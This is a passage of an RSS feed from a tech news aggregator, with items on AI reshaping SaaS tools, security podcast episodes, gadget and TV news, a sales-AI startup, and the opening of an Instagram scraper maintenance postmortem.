<p>Dashboards over existing data need to make a rapid change. But tools that produce underlying data need to change as well. Instead of producing dashboards for human consumption, these tools are turning hard towards providing <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) implementations that AI agents can consume.  </p>



<p>One meta-coding area where I have found AI provides real value is in log examination. When a problem occurs, the first question that usually gets asked is, “Where is the log of that happening?” Back in the before times, you’d have to pore over the log, line by line, searching for exactly what happened for clues into the source of the problem. But now? Give the log, however large, to an AI agent, and those answers appear in a matter of minutes. </p>



<p>Producing the log becomes the real value—displaying dashboards over that data becomes less important. A tool like Datadog owns the ingestion pipeline and the time-series production, and it creates valuable data, so its pivot is easier. Datadog need only create a tool that talks to an AI agent instead of a human. Their beachhead is solid. The real value of logs lies in an agent’s ability to peer into them in real time and take action based on what it sees. It won’t be long until, whenever a problem occurs, an MCP server will notify an AI agent and the agent will analyze the problem, fix it, and deploy the fix, all without human intervention.  </p>



<p>Producing and owning the data beats being able to interpret the data. Tools that produce the data can lean into the AI revolution. Tools that merely read and display data from a different source—say, an existing repository—will have a much harder time surviving alongside AI agents. </p>



<h2 class="wp-block-heading">The soul of a new user</h2>



<p>Any provider of a software tool that is part of a development or operations workflow should be working very hard to provide an MCP or a CLI for an AI agent to use, because <em>that</em> is the future. A CI/CD system needs to be able to respond to events without a human being involved at all. Such tools become the data source and will have an entirely different front end. Instead of humans looking at dashboards, it will be AI agents making MCP queries into the tool. </p>



<p>This is where the disruption is really happening. One might even say your customer is no longer a software development manager but an AI agent’s MCP server. How long will it be before we have AI tools making purchasing decisions after running thousands of simulations against a set of potential new tools? Previously, software tool companies put a lot of energy into slick-looking UIs, web pages with solid copy, and all kinds of bells and whistles meant for human consumption. </p>



<p>But does any of that matter if you are actually selling to an AI agent? Does your MCP server actually return data that <em>another</em> MCP server can consume and use? </p>



<p>Everything that SaaS companies have learned to do to be successful is now being turned on its head. AI agents don’t care one whit about cool-looking websites and clever marketing copy. Selling to a machine that doesn’t care about your pitch, your carefully crafted brand, or your clever logo is a game that no one has ever played before. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA["If it continues like this WoW will inevitably die": World of Warcraft players beg Blizzard to slow down — for all the wrong reasons]]></title>
<description><![CDATA[I recently alluded to this idea that World of Warcraft is losing control of its quality ... well, control. And this concept really came to ahead this week with Midnight's 12.0.5 patch, which introduced a mountain of new bugs.]]></description>
<link>https://tsecurity.de/de/3457087/windows-tipps/if-it-continues-like-this-wow-will-inevitably-die-world-of-warcraft-players-beg-blizzard-to-slow-down-for-all-the-wrong-reasons/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3457087/windows-tipps/if-it-continues-like-this-wow-will-inevitably-die-world-of-warcraft-players-beg-blizzard-to-slow-down-for-all-the-wrong-reasons/</guid>
<pubDate>Thu, 23 Apr 2026 09:08:41 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I recently alluded to this idea that World of Warcraft is losing control of its quality ... well, control. And this concept really came to ahead this week with Midnight's 12.0.5 patch, which introduced a mountain of new bugs.]]></content:encoded>
</item>
<item>
<title><![CDATA[From Shame to Fame: Changing Behaviors and RSAC Interviews from Tanium and Illumio - Andrew Rubin, Craig Taylor, Tim Morris - BSW #444]]></title>
<description><![CDATA[Why have security awareness training programs failed? Maybe we need to understand human psychology. Humans don't like tricks, or to be shamed, or negative emotions. Humans want to be rewarded, but yet our training and phishing programs are not built for reward. Maybe it's time to rethink cyber li...]]></description>
<link>https://tsecurity.de/de/3454217/it-security-nachrichten/from-shame-to-fame-changing-behaviors-and-rsac-interviews-from-tanium-and-illumio-andrew-rubin-craig-taylor-tim-morris-bsw-444/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3454217/it-security-nachrichten/from-shame-to-fame-changing-behaviors-and-rsac-interviews-from-tanium-and-illumio-andrew-rubin-craig-taylor-tim-morris-bsw-444/</guid>
<pubDate>Wed, 22 Apr 2026 11:37:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Why have security awareness training programs failed? Maybe we need to understand human psychology. Humans don't like tricks, or to be shamed, or negative emotions. Humans want to be rewarded, but yet our training and phishing programs are not built for reward. Maybe it's time to rethink cyber literacy.</p> <p>Craig Taylor, CEO and Co-founder at CyberHoot, joins Business Security Weekly to discuss why we need to shift our Cyber Literacy industry from shame and punishment towards gamification, positive reinforcement, and small rewards. If we truly aspire to change behaviors, then we need a different approach. Craig will discuss how a multi-disciplinary approach rooted in science is the future of training and phishing programs.</p> <p>Segment Resources:</p> <p>Individual Registration (Free Personal Training for Life): <a rel="noopener" target="_blank" href="https://cyberhoot.com/individuals/">https://cyberhoot.com/individuals/</a> Newsletter Registration: <a rel="noopener" target="_blank" href="https://cyberhoot.com/newsletters/">https://cyberhoot.com/newsletters/</a> Blog Articles: <a rel="noopener" target="_blank" href="https://cyberhoot.com/blog/">https://cyberhoot.com/blog/</a> Cybrary (Library of 1000+ Cybersecurity Terms in non-technical language): <a rel="noopener" target="_blank" href="https://cyberhoot.com/cybrary/">https://cyberhoot.com/cybrary/</a> Special Podcast Offer: 20% off CyberHoot for 1 year using the podcast's unique coupon code: "Business Security Weekly"</p> <p>From Reactive to Autonomous: Real-Time Endpoint Intelligence in the Age of AI As organizations experiment with agentic AI and autonomous security operations, many are discovering a difficult reality: AI is only as effective as the data and visibility behind it. Yet most enterprises still struggle to answer basic questions about their endpoints in real time.</p> <p>In this conversation, we'll explore how IT and security teams are evolving from reactive operations toward proactive, preventative, and ultimately autonomous models. The journey begins with real-time endpoint intelligence—the ability to see, understand, and act across every endpoint in seconds.</p> <p>This segment is sponsored by Tanium. Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/taniumrsac">https://securityweekly.com/taniumrsac</a> to learn more about them!</p> <p>Hard Truths: The Lies We Keep Buying in Cybersecurity Cybersecurity isn't broken because of a lack of technology—it's broken because the industry avoids hard truths. Fear still drives budgets. AI is oversold as a cure‑all while foundations remain weak, and CISOs are held accountable without the authority to change outcomes. In this conversation, Illumio CEO and founder Andrew Rubin breaks down what must change to build real resilience—because the next breach won't just impact the business, it could end a career.</p> <p>For more information about Illumio, please visit: <a rel="noopener" target="_blank" href="https://securityweekly.com/illumiorsac">https://securityweekly.com/illumiorsac</a></p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/bsw">https://www.securityweekly.com/bsw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/bsw-444">https://securityweekly.com/bsw-444</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From Shame to Fame: Changing Behaviors and RSAC Interviews from Tanium and Illumio - BSW #444]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 Why have security awareness training programs failed?  Maybe we need to understand human psychology.   Humans don't like tricks, or to be shamed, or negative emotions.  Humans want to be rewarded, but yet our training and phishing...]]></description>
<link>https://tsecurity.de/de/3454160/it-security-video/from-shame-to-fame-changing-behaviors-and-rsac-interviews-from-tanium-and-illumio-bsw-444/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3454160/it-security-video/from-shame-to-fame-changing-behaviors-and-rsac-interviews-from-tanium-and-illumio-bsw-444/</guid>
<pubDate>Wed, 22 Apr 2026 11:18:11 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/JnpjPnHtFTE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Why have security awareness training programs failed?  Maybe we need to understand human psychology.   Humans don't like tricks, or to be shamed, or negative emotions.  Humans want to be rewarded, but yet our training and phishing programs are not built for reward.  Maybe it's time to rethink cyber literacy.<br />
<br />
Craig Taylor, CEO and Co-founder at CyberHoot, joins Business Security Weekly to discuss why we need to shift our Cyber Literacy industry from shame and punishment towards gamification, positive reinforcement, and small rewards.  If we truly aspire to change behaviors, then we need a different approach. Craig will discuss how a multi-disciplinary approach rooted in science is the future of training and phishing programs.<br />
<br />
Segment Resources:<br />
Individual Registration (Free Personal Training for Life): https://cyberhoot.com/individuals/<br />
Newsletter Registration: https://cyberhoot.com/newsletters/<br />
Blog Articles: https://cyberhoot.com/blog/<br />
Cybrary (Library of 1000+ Cybersecurity Terms in non-technical language): https://cyberhoot.com/cybrary/<br />
Special Podcast Offer: 20% off CyberHoot for 1 year using the podcast’s unique coupon code: "Business Security Weekly"<br />
<br />
<br />
From Reactive to Autonomous: Real-Time Endpoint Intelligence in the Age of AI<br />
As organizations experiment with agentic AI and autonomous security operations, many are discovering a difficult reality: AI is only as effective as the data and visibility behind it. Yet most enterprises still struggle to answer basic questions about their endpoints in real time. <br />
<br />
In this conversation, we’ll explore how IT and security teams are evolving from reactive operations toward proactive, preventative, and ultimately autonomous models. The journey begins with real-time endpoint intelligence—the ability to see, understand, and act across every endpoint in seconds. <br />
<br />
This segment is sponsored by Tanium. Visit https://securityweekly.com/taniumrsac to learn more about them!<br />
<br />
<br />
Hard Truths: The Lies We Keep Buying in Cybersecurity<br />
Cybersecurity isn’t broken because of a lack of technology—it’s broken because the industry avoids hard truths. Fear still drives budgets. AI is oversold as a cure‑all while foundations remain weak, and CISOs are held accountable without the authority to change outcomes. In this conversation, Illumio CEO and founder Andrew Rubin breaks down what must change to build real resilience—because the next breach won’t just impact the business, it could end a career. <br />
<br />
For more information about Illumio, please visit: https://securityweekly.com/illumiorsac<br />
<br />
Visit https://www.securityweekly.com/bsw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/bsw-444<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is upending the SaaS game]]></title>
<description><![CDATA[It’s quite clear that agentic coding has completely taken over the software development world. Writing code will never be the same. Shoot, it won’t be long before we aren’t writing any code at all because agents can write it better and faster than we humans can. That may already be true today. 

...]]></description>
<link>https://tsecurity.de/de/3454101/ai-nachrichten/ai-is-upending-the-saas-game/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3454101/ai-nachrichten/ai-is-upending-the-saas-game/</guid>
<pubDate>Wed, 22 Apr 2026 11:02:57 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It’s quite clear that agentic coding has completely taken over the software development world. Writing code will never be the same. Shoot, it won’t be long before we aren’t writing any code at all because agents can write it better and faster than we humans can. That may already be true today. </p>



<p>But there is more to software development than merely writing code, and those areas—<a href="https://www.infoworld.com/article/2260350/version-control-track-the-who-what-and-when-of-software-changes.html" data-type="link" data-id="https://www.infoworld.com/article/2260350/version-control-track-the-who-what-and-when-of-software-changes.html">source control</a>, documentation, <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD</a>, project management—are ripe for some serious disruption from AI as well. Those areas may well be hit harder than coding itself. </p>



<p>I would imagine that if you were in the business of analyzing data and providing dashboard-level insights into that data, then you would be very worried indeed about what AI is going to do to your value proposition. Much of the SaaS industry is in the business of analyzing existing data, and that is exactly what AI agents can do well. When a simple question can get straight to the heart of what a pricey dashboard provides, then companies have to question the value of paying for that kind of service.  </p>



<p>Tools like LinearB, Jellyfish, and Swarmia provide deep and interesting insights into what is going on inside your repository, but if you can say to <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html" data-type="link" data-id="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a>, “What are the DORA metrics for this repository?”, well, then those businesses are definitely ripe for disruption, no? </p>



<h2 class="wp-block-heading">Pivoting to AI</h2>



<p>Those tools are already reacting by pivoting hard and leaning into the AI revolution. They are doing things like focusing on measuring AI processes instead of providing team insights. These tools are now pitching that they monitor not your development team but your AI development process, which is the kind of thing they have to do when the ground under their feet is shifting. The disruption is real, and they have to change or die. </p>



<p>Dashboards over existing data need to make a rapid change. But tools that produce underlying data need to change as well. Instead of producing dashboards for human consumption, these tools are turning hard towards providing <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) implementations that AI agents can consume.  </p>



<p>One meta-coding area where I have found AI provides real value is in log examination. When a problem occurs, the first question that usually gets asked is, “Where is the log of that happening?” Back in the before times, you’d have to pore over the log, line by line, searching for exactly what happened for clues into the source of the problem. But now? Give the log, however large, to an AI agent, and those answers appear in a matter of minutes. </p>



<p>Producing the log becomes the real value—displaying dashboards over that data becomes less important. A tool like Datadog owns the ingestion pipeline and the time-series production, and it creates valuable data, so its pivot is easier. Datadog need only create a tool that talks to an AI agent instead of a human. Their beachhead is solid. The real value of logs lies in an agent’s ability to peer into them in real time and take action based on what it sees. It won’t be long until, whenever a problem occurs, an MCP server will notify an AI agent and the agent will analyze the problem, fix it, and deploy the fix, all without human intervention.  </p>



<p>Producing and owning the data beats being able to interpret the data. Tools that produce the data can lean into the AI revolution. Tools that merely read and display data from a different source—say, an existing repository—will have a much harder time surviving alongside AI agents. </p>



<h2 class="wp-block-heading">The soul of a new user</h2>



<p>Any provider of a software tool that is part of a development or operations workflow should be working very hard to provide an MCP or a CLI for an AI agent to use, because <em>that</em> is the future. A CI/CD system needs to be able to respond to events without a human being involved at all. Such tools become the data source and will have an entirely different front end. Instead of humans looking at dashboards, it will be AI agents making MCP queries into the tool. </p>



<p>This is where the disruption is really happening. One might even say your customer is no longer a software development manager but an AI agent’s MCP server. How long will it be before we have AI tools making purchasing decisions after running thousands of simulations against a set of potential new tools? Previously, software tool companies put a lot of energy into slick-looking UIs, web pages with solid copy, and all kinds of bells and whistles meant for human consumption. </p>



<p>But does any of that matter if you are actually selling to an AI agent? Does your MCP server actually return data that <em>another</em> MCP server can consume and use? </p>



<p>Everything that SaaS companies have learned to do to be successful is now being turned on its head. AI agents don’t care one whit about cool-looking websites and clever marketing copy. Selling to a machine that doesn’t care about your pitch, your carefully crafted brand, or your clever logo is a game that no one has ever played before. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oppo Find X9s Launched With Dimensity 9500s SoC, Hasselblad-Tuned 50-Megapixel Cameras: Price, Specifications]]></title>
<description><![CDATA[Oppo Find X9s has been launched in select global markets. The new smartphone is the second model in the Find X9s lineup, which also includes the China-exclusive Oppo Find X9s Pro. The handset is currently available for purchase via the Oppo Malaysia online store. It is offered in three colour opt...]]></description>
<link>https://tsecurity.de/de/3453599/it-nachrichten/oppo-find-x9s-launched-with-dimensity-9500s-soc-hasselblad-tuned-50-megapixel-cameras-price-specifications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3453599/it-nachrichten/oppo-find-x9s-launched-with-dimensity-9500s-soc-hasselblad-tuned-50-megapixel-cameras-price-specifications/</guid>
<pubDate>Wed, 22 Apr 2026 08:02:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Oppo Find X9s has been launched in select global markets. The new smartphone is the second model in the Find X9s lineup, which also includes the China-exclusive Oppo Find X9s Pro. The handset is currently available for purchase via the Oppo Malaysia online store. It is offered in three colour options, dubbed Lavender Sky, Midnight Grey, and Sunset Orange. The phone wi...]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Finally Reveals Silo Season 3 Release Date And First Trailer]]></title>
<description><![CDATA[Fans of dystopian science fiction have a big reason to celebrate this week. Apple has officially announced the exact launch schedule for the highly anticipated third chapter of its hit underground drama. The company also dropped an exciting new teaser video to give eager viewers a sneak peek at w...]]></description>
<link>https://tsecurity.de/de/3452378/ios-mac-os/apple-tv-finally-reveals-silo-season-3-release-date-and-first-trailer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3452378/ios-mac-os/apple-tv-finally-reveals-silo-season-3-release-date-and-first-trailer/</guid>
<pubDate>Tue, 21 Apr 2026 19:08:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fans of dystopian science fiction have a big reason to celebrate this week. Apple has officially announced the exact launch schedule for the highly anticipated third chapter of its hit underground drama. The company also dropped an exciting new teaser video to give eager viewers a sneak peek at what comes next.



The brand recently shared a new update on Silo's final two seasons, confirming the upcoming episodes will arrive on Apple TV this September.



Juliette uncovers dark secrets hidden in the outside world



The newly released trailer picks up right where the intense second chapter ended. Juliette Nichols, played by Rebecca Ferguson, is now surviving outside the main shelter. The short video clip reveals she is not alone in the toxic wasteland. She quickly discovers multiple other underground structures just like her own.



Season three will dive heavily into the massive conspiracy keeping humanity trapped. Juliette must figure out who controls the other shelters while trying to stay alive on the ruined surface.



The footage shows her forming tense alliances with survivors from neighboring bunkers as she searches for answers. You can watch the trailer below.




https://www.youtube.com/watch?v=C9-_VVX9BvE




The new season explains how the underground system started



Beyond the present-day struggle, the next batch of episodes will answer massive questions about the past. Based on the second book in the original novel series, the story shifts focus to show exactly how the massive concrete bunkers were built in the first place.



Viewers will finally see the historical choices that forced people underground. The plot explains the origins of the strict rules governing everyday life below the surface. This deep look into the past helps explain why the current leaders are so terrified of anyone leaving the main doors.



It promises to be the most revealing chapter yet for fans who want to understand the complete timeline. Don’t forget, Apple TV has already renewed Silo for a final season 4.]]></content:encoded>
</item>
<item>
<title><![CDATA[What AI model should you use for revenue intelligence? Von says all the big ones, and it will automate mixing and matching for you]]></title>
<description><![CDATA[Looking at enterprise AI adoption, VentureBeat has anecdotally observed a fairly wide divergence when it comes to specific roles: For those who build—engineers and developers—the arrival of AI has been transformative, moving through the workflow with the speed of tools like Claude Code and Cursor...]]></description>
<link>https://tsecurity.de/de/3452042/it-nachrichten/what-ai-model-should-you-use-for-revenue-intelligence-von-says-all-the-big-ones-and-it-will-automate-mixing-and-matching-for-you/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3452042/it-nachrichten/what-ai-model-should-you-use-for-revenue-intelligence-von-says-all-the-big-ones-and-it-will-automate-mixing-and-matching-for-you/</guid>
<pubDate>Tue, 21 Apr 2026 17:17:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Looking at enterprise AI adoption, VentureBeat has anecdotally observed a fairly wide divergence when it comes to specific roles: For those who build—engineers and developers—the arrival of AI has been transformative, moving through the workflow with the speed of tools like Claude Code and Cursor to automate the heavy lifting of syntax and architecture. </p><p>Yet, for those who sell, the "revenue stack" has remained a fragmented collection of data silos, manual CRM entries, and anecdotal reporting. </p><p><a href="https://vonlabs.ai/">Von</a>, a new AI platform emerging from the team behind process automation startup <a href="https://www.gorattle.com/">Rattle</a>, aims to bridge this gap. By positioning itself not as another "point solution" but as a foundational "intelligence layer," Von seeks to do for Go-To-Market (GTM) teams what the modern IDE has done for the developer: provide a single, reasoning interface that understands the entire business context.</p><p>“AI has revolutionized the workflow for people who build things, but there is nothing that has revolutionized the workflow for people who sell those things," <a href="https://www.linkedin.com/posts/saggarwal2_meet-von-the-ai-data-scientist-for-revops-activity-7402011548321583104-H9Ct/">Von CEO Sahil Aggarwal</a> said in a recent video call interview with VentureBeat. "That is what we are trying to build with Von”.</p><h2><b>Technology: The context graph and multi-model engine</b></h2><p>At the core of Von’s capability is a departure from the traditional "search bar" approach to enterprise AI. While standard LLMs often struggle with the sprawling, unstructured nature of sales data, Von begins its deployment by building a "context graph" of a company’s entire business. </p><p>This process involves ingesting structured data from CRMs like Salesforce and HubSpot, alongside unstructured data from call recorders (Gong, Zoom, Chorus), email threads, and internal documentation.</p><p>"Once Von builds this context graph, it will understand your business better than anyone else in the company,"  Aggarwal said.</p><p>This understanding is rooted in a company’s specific "ontology"—the unique language of its deal stages, territory definitions, and institutional knowledge. </p><p>"We train these foundational models on a company’s own business and ontology to make the model work for them," the CEO addded.</p><p>Instead of relying on a single large language model, Von utilizes a "mixture of models" strategy to optimize performance and cost. In this architecture, Anthropic's Claude is deployed for high-level reasoning and "thinking," ChatGPT handles bulk data processing, and Google’s Gemini is utilized for generating creative assets such as decks and reports.</p><p>This technical approach allows Von to resolve a common frustration in Sales Operations: the gap between what is logged in a CRM and what actually happened in a meeting. By cross-referencing call transcripts with Salesforce records, the system can identify discrepancies in "lost reasons" or verify deal health based on sentiment rather than just a rep’s manual update.</p><h2><b>From reporting queues to AI headcount</b></h2><p>Von is designed to function as an "AI Data Scientist" or a "VP of RevOps" that lives on top of the enterprise's existing revenue tracking tools. </p><p>During an initial product demonstration, Aggarwal showed how the platform could analyze 101 SMB accounts to identify churn risk in just over three minutes—a task he estimates would take a human analyst one to two weeks.</p><p>The platform’s primary interface resembles a chat environment, but the outputs are designed to be actionable revenue assets. Key functionalities include:</p><ul><li><p><b>Deal Health Monitoring</b>: Cross-referencing calls and emails to surface "risky" commits that might otherwise go unnoticed until the end of a quarter.</p></li><li><p><b>Automated Briefing</b>: Generating pre-call context docs that draw from the entire history of an account, ensuring reps are briefed on every previous touchpoint.</p></li><li><p><b>Win/Loss Analysis</b>: Clustered analysis of transcripts to find the "true" reasons for lost deals, often finding that the recorded reason in the CRM does not match the customer's actual feedback.</p></li><li><p><b>Revenue Operations Automation</b>: Handling "low-level" Salesforce admin tasks, such as creating flows, validation rules, or cleaning up account territories.</p></li></ul><p>The goal is to shift Revenue Operations (RevOps) from a "reporting queue" that handles ad-hoc data requests into an infrastructure layer. </p><p>As <a href="https://vonlabs.ai/blog/cro-run-business-in-chat-ai-revops">Kieran Snaith, SVP of Revenue Operations at Qualified</a>, noted in a Von testimonial blog post, the goal is to allow leaders to "run the business in chat," asking complex questions about forecast confidence or pipeline risk and receiving data-backed answers instantly.</p><h2><b>Pivoting into 'the next Salesforce'</b></h2><p>Von is operated by Rattle Software Inc., a company that previously found success with "Rattle," a mid-seven-figure revenue business focused on Salesforce-Slack integrations. Aggarwal describes Von as a significant pivot toward a larger opportunity, aiming to build "the next Salesforce". </p><p>The business has seen rapid early traction, reportedly crossing $500,000 in revenue within its first eight weeks of launch, with projections to reach $10 million in its first year.</p><p>The product is governed by a commercial, proprietary license typical of enterprise SaaS. Unlike open-source tools, Von’s "restricted" license means the underlying source code and the "context graph" technology are proprietary to Rattle Software Inc.. Users are granted a non-transferable, non-exclusive right to use the software for internal business purposes, with the company maintaining all rights, title, and interest in the service.</p><p>This philosophy of deep integration extends to the broader SaaS ecosystem, where Aggarwal observes, "Point solutions in SaaS are essentially dead. They will have a very hard time surviving in this world, because point solutions can now be white-coded within a company."</p><p>Pricing follows a hybrid model of per-seat subscriptions and consumption-based credits. This structure is designed to scale with the persona using the tool; for instance, a Chief Revenue Officer (CRO) seat may cost $1,000 per month for deep strategic analysis, while individual seller seats may be as low as $20 per month for basic research and follow-up tasks. </p><p>The company is currently backed by several tier-one venture capital firms, including Sequoia Capital, Lightspeed, Insight Partners, and GV (Google Ventures).</p><h2><b>Early adopter reaction</b></h2><p>The reaction from early adopters highlights a shift in how AI is being integrated into the sales org.</p><p>Taylor Kelly, Head of Revenue Operations at Tapcart, remarked that "Von handles the analysis and insights that would normally require hiring another full-time analyst," specifically citing its ability to handle complex Salesforce configurations and deal risk assessments. </p><p>Similarly, Evan Briere, VP of Partnerships at DemandScience, noted that Von’s direct connection to data sources makes it "actually applicable" compared to more "theoretical" horizontal AI tools like ChatGPT.</p><p>Other community feedback from the platform’s early users includes:</p><ul><li><p><b>CJ Oordt, Sales Director at Coalesce</b>: Described it as a "research assistant who knows every conversation and note".</p></li><li><p><b>Rob Janke, Director of Revenue Operations at QuickNode</b>: Stated that Von "solved this gap before we could even start building it ourselves".</p></li><li><p><b>Sydney, Head of Renewals at 15Five</b>: Highlighted its impact on renewal intelligence, allowing her to analyze actual conversation signals across an entire book of business in minutes.</p></li></ul><p>The prevailing sentiment among these users is that Von serves as "additional headcount" rather than just a tool. This mirrors the company’s internal metrics, which report that Von is already completing over 10,000 revenue tasks per week for its customer base.</p><h2><b>An autonomous revenue org</b></h2><p>The introduction of Von signals a maturing of AI in the enterprise. We are moving past the era of "AI as a feature"—where a chatbot is simply bolted onto an existing CRM—toward "AI as a persona". </p><p>By training foundational models on a company’s specific business logic, Von is attempting to create a system that doesn't just return data but offers "judgment calls".As organizations look toward the rest of 2026, the challenge for RevOps leaders will be one of trust and infrastructure. </p><p>If Von can maintain its claimed <b>95% accuracy</b> in predicting deal outcomes, the role of the human salesperson will inevitably shift toward higher-value relationship management, leaving the "data science" of sales to the agents. </p><p>For now, Von remains a high-growth experiment in whether the "intelligence layer" can finally bring the same level of revolutionary workflow to the people who sell as it has to the people who build.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Instagram Scraper Broke 12 Times in 6 Weeks: A Maintenance Postmortem]]></title>
<description><![CDATA[Image created by OpenAII built an Instagram scraper in three days.Over the next six weeks, I spent 48 hours keeping it alive.That ratio tells you almost everything you need to know about scraping modern, heavily protected websites.The first version worked well enough to create a false sense of su...]]></description>
<link>https://tsecurity.de/de/3447760/hacking/instagram-scraper-broke-12-times-in-6-weeks-a-maintenance-postmortem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3447760/hacking/instagram-scraper-broke-12-times-in-6-weeks-a-maintenance-postmortem/</guid>
<pubDate>Mon, 20 Apr 2026 11:21:09 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="instagram scraper DIY vs. managed scraping API" src="https://cdn-images-1.medium.com/max/1024/1*iyuxIu67JblqpM36eQ6V9w.png"><figcaption>Image created by OpenAI</figcaption></figure><p>I built an Instagram scraper in three days.</p><p>Over the next six weeks, I spent 48 hours keeping it alive.</p><p>That ratio tells you almost everything you need to know about scraping modern, heavily protected websites.</p><p>The first version worked well enough to create a false sense of success. It could fetch profiles, extract posts, collect comments, and store the results. In development, it looked finished. In practice, it was only the beginning. Once the scraper started running against a live, changing platform, the real engineering work began: stale selectors, rate limits, degraded sessions, blocked IPs, JavaScript-rendered content, and constant low-level breakage that turned a small utility into an ongoing maintenance burden.</p><p>This article is not a tutorial on how to scrape Instagram. It is a postmortem on what broke after the first version worked, how long each class of failure took to fix, and why a scraper that works in development is very different from one that survives in production.</p><h3>The Initial Build Looked Solid</h3><p>The first implementation included the usual pieces:</p><ul><li>an HTTP client with realistic browser headers</li><li>session and cookie handling for authenticated access</li><li>retry and throttling logic</li><li>persistence for profiles, posts, and comments</li></ul><p>That was enough to get the project off the ground. In the first few days, I was able to scrape a few hundred profiles without serious issues. The output looked clean, the code was structured, and the project felt stable enough to move on.</p><p>My commit message at that point was:</p><pre>feat: initial scraper implementation - profiles, posts, and comments extraction</pre><p>In retrospect, that was not a production scraper. It was a working prototype with a narrow operating window.</p><h3>Week 2: DOM Changes Broke Extraction Without Breaking Execution</h3><p>The first real failure was quiet.</p><p>The scraper still ran, but the output started degrading. Profiles came back as null. Post arrays were empty. Comment extraction silently failed. Nothing crashed, which made the problem more dangerous: if you only looked at process health, the scraper appeared fine.</p><p>The root cause was stale extraction logic. Instagram had changed enough of the DOM structure that the selectors I depended on no longer matched the right nodes. Class names had shifted, attributes had disappeared, and some data paths were no longer where I expected them to be.</p><p>This took <strong>8 hours</strong> to fix in total:</p><ul><li><strong>3 hours</strong> identifying where extraction started failing</li><li><strong>3 hours</strong> rewriting selectors and parsing logic</li><li><strong>2 hours</strong> validating output against previous results</li></ul><p>The commit looked simple:</p><pre>fix: update CSS selectors after DOM change</pre><p>This was the first reminder that in scraping, successful execution does not mean successful extraction.</p><h3>Week 3: Rate Limits, Session Problems, and 429 Errors</h3><p>The next break was much more obvious.</p><p>Requests started failing with 429 Too Many Requests. Authentication became inconsistent. Some sessions stopped persisting correctly, and the account/IP combination I was using was clearly being treated differently than before.</p><p>This forced changes in several places at once:</p><ul><li>request pacing</li><li>retry behavior</li><li>concurrency</li><li>session reuse</li><li>proxy handling</li></ul><p>I ended up spending <strong>10 hours</strong> on this round of fixes:</p><ul><li><strong>2 hours</strong> analyzing logs and failure patterns</li><li><strong>3 hours</strong> testing slower intervals and backoff strategies</li><li><strong>3 hours</strong> implementing basic IP rotation</li><li><strong>2 hours</strong> reworking session handling and authentication retries</li></ul><p>The resulting commits were:</p><pre>fix: add exponential backoff + request throttling<br>chore: implement basic IP rotation</pre><p>This was the point where the project stopped feeling like a parser and started feeling like infrastructure. Once request volume matters, scraping becomes less about data extraction and more about surviving the environment around it.</p><h3>Week 4: Static Requests Were No Longer Enough</h3><p>By the next phase, a different class of failure appeared.</p><p>Requests that had previously returned useful page content started returning mostly empty HTML shells: scripts, placeholders, and very little real data. The page rendered correctly in a browser, but the raw response no longer contained enough information to parse.</p><p>That usually means one thing: more of the content path has moved behind client-side rendering.</p><p>To keep extracting data, I had to add a JavaScript execution layer and move part of the scraper to a headless browser workflow. That changed the project significantly. It increased runtime cost, added another maintenance surface, and introduced a whole new set of ways to get blocked.</p><p>That migration took <strong>12 hours</strong>:</p><ul><li><strong>4 hours</strong> confirming the issue was rendering-related</li><li><strong>5 hours</strong> integrating a headless browser into the pipeline</li><li><strong>3 hours</strong> adapting 